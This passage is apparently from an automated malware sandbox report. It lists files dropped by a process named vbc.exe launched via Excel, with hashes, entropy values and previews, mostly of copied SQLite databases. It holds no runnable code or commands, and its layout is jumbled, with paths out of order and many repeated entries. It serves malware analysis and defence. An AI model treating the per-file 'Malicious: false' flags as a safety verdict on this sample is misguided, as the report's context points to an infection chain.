File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 11303
Entropy (8bit): 7.909402464702408
Encrypted: false
SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 2647
Entropy (8bit): 7.8900124483490135
Encrypted: false
SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
MD5: E46357D82EBC866EEBDA98FA8F94B385
SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.70435191336402
Encrypted: false
SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5: 8C1F71001ABC7FCE68B3F15299553CE7
SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.690067217069288
Encrypted: false
SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5: 4E32787C3D6F915D3CB360878174E142
SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious: false
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.70435191336402
Encrypted: false
SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5: 8C1F71001ABC7FCE68B3F15299553CE7
SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious: false
Preview: NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.690067217069288
Encrypted: false
SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5: 4E32787C3D6F915D3CB360878174E142
SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious: false
Preview:
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp
C:\Users\user\AppData\Local\Temp\tmp533A.tmp
C:\Users\user\AppData\Local\Temp\tmp6222.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp
C:\Users\user\AppData\Local\Temp\tmp6417.tmp
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.9650411582864293
Encrypted: false
SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5: 903C35B27A5774A639A90D5332EEF8E0
SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp
Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.9650411582864293
Encrypted: false
SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5: 903C35B27A5774A639A90D5332EEF8E0
SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp
C:\Users\user\AppData\Local\Temp\tmp7108.tmp
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
C:\Users\user\AppData\Local\Temp\tmp738B.tmp
C:\Users\user\AppData\Local\Temp\tmp7486.tmp
C:\Users\user\AppData\Local\Temp\tmp7551.tmp
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
C:\Users\user\AppData\Local\Temp\tmp764C.tmp
C:\Users\user\AppData\Local\Temp\tmp7718.tmp
C:\Users\user\AppData\Local\Temp\tmp7841.tmp
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp790D.tmp (continued)
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Copyright Joe Security LLC 2022 Page 28 of 65
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category: dropped
Size (bytes): 524288
Entropy (8bit): 0.08107860342777487
Encrypted: false
SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious: false
Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category: dropped
Size (bytes): 524288
Entropy (8bit): 0.08107860342777487
Encrypted: false
SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious: false
Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMP
